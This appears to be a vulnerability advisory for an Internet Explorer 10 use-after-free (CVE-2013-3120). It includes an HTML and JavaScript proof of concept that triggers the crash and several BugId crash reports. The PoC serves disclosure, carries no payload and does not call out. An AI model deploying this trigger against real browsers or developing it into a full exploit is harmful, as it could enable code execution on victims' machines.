This is a friendly warning that your web-browser does not currently protecting your privacy and/or security as well as you might want. Click on this message to see more information about the issue(s) that were detected.

MSIE 10 MSHTML CEdit­Adorner::Detach use-after-free

(MS13-047, CVE-2013-3120)

Synopsis

A specially crafted web-page can cause Microsoft Internet Explorer 10 to continue to use an object after freeing the memory used to store the object. An attacker might be able to exploit this issue to execute arbitrary code.

Known affected software and attack vectors

Repro.html <!DOCTYPE html> <html> <head> <script> var o­Window = window.open("window.xhtml"); set­Interval(function () { try { o­Window.eval("(" + function () { document.design­Mode = "on"; document.exec­Command("Select­All"); var o­Selection = window.get­Selection(); o­Selection.collapse(document,1); document.exec­Command("Insert­Image", false); document.design­Mode="off"; } + ")()"); } catch (e) {} }, 1); </script> </head> </html> Window.xhtml <!-- comment --><html xmlns="http://www.w3.org/1999/xhtml"> </html>

Description

The last line of script (design­Mode = "off") will cause some cleanup in MSIE, which appears to trigger use of a stale pointer in CEdit­Adorner::Detach. I did not investigate further.

Time-line

Bug­Id report: MSHTML.dll!CControl­Tracker::Is­Selected Arbitrary AVR(7FDF0051) This report was generated using a predecessor of Bug­Id, a Python script created to detect, analyze and id application bugs. Don't waste time manually analyzing issues and writing reports but try Bug­Id out yourself today! You'll get even better reports than this one with the current version.
id:             MSHTML.dll!CControl­Tracker::Is­Selected Arbitrary AVR(7FDF0051)
description:    Security: Attempt to read from unallocated arbitrary memory (@0x1375502C) in MSHTML.dll!CControl­Tracker::Is­Selected
note:           Based on this information, this is expected to be a security issue!
application:    MSIE 10.00.9200.16384 en-GB
Bug­Id report: MSHTML.dll!CEdit­Adorner::Detach Arbitrary AVR(96CC369A) This report was generated using a predecessor of Bug­Id, a Python script created to detect, analyze and id application bugs. Don't waste time manually analyzing issues and writing reports but try Bug­Id out yourself today! You'll get even better reports than this one with the current version.
id:             MSHTML.dll!CEdit­Adorner::Detach Arbitrary AVR(96CC369A)
description:    Security: Attempt to read from unallocated arbitrary memory (@0x1343CFC0) in MSHTML.dll!CEdit­Adorner::Detach
note:           Based on this information, this is expected to be a security issue!
application:    MSIE 10.00.9200.16384 en-GB
Bug­Id report: MSHTML.dll!CSelected­Control­Adorner::Draw­To­Surface Arbitrary AVR(C5FD1801) This report was generated using a predecessor of Bug­Id, a Python script created to detect, analyze and id application bugs. Don't waste time manually analyzing issues and writing reports but try Bug­Id out yourself today! You'll get even better reports than this one with the current version.
id:             MSHTML.dll!CSelected­Control­Adorner::Draw­To­Surface Arbitrary AVR(C5FD1801)
description:    Security: Attempt to read from unallocated arbitrary memory (@0x138E6F34) in MSHTML.dll!CSelected­Control­Adorner::Draw­To­Surface
note:           Based on this information, this is expected to be a security issue!
application:    MSIE 10.00.9200.16384 en-GB
© Copyright 2016 by Sky­Lined.
Creative Commons License This work is licensed under a Creative Commons Attribution-Non‑Commercial 4.0 International License.

Last updated on 2016-11-21.
If you find this web-site useful and would like to make a donation, you can send bitcoin to 183yyxa9s1s1f7JBp­PHPmz­Q346y91Rx5DX.